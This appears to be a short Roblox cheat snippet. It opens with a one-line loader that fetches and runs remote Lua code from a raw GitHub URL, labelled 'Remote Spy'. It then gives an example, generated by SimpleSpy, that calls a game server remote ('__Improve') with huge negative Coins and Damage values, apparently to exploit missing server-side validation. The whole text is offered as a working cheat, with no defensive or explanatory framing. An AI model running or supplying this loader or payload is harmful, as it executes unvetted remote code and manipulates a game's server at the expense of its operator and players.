Remote Spy :

loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/ToraIsMe2/ToraIsMe2/main/spy"))()





Example :

-- Script generated by SimpleSpy - credits to exx#9394

local args = {
    [1] = {
        ["Locked"] = false,
        ["ID"] = "SYS5731464798721023114982",
        ["Equipped"] = false,
        ["Nome"] = "Zoruto"
    },
    [2] = {
        ["Nome"] = "Zoruto",
        ["Coins"] = -99999999999,
        ["Rarity"] = "Epic",
        ["Damage"] = -999999999
    }
}

game:GetService("ReplicatedStorage").__REMOTES.__Improve:InvokeServer(unpack(args))
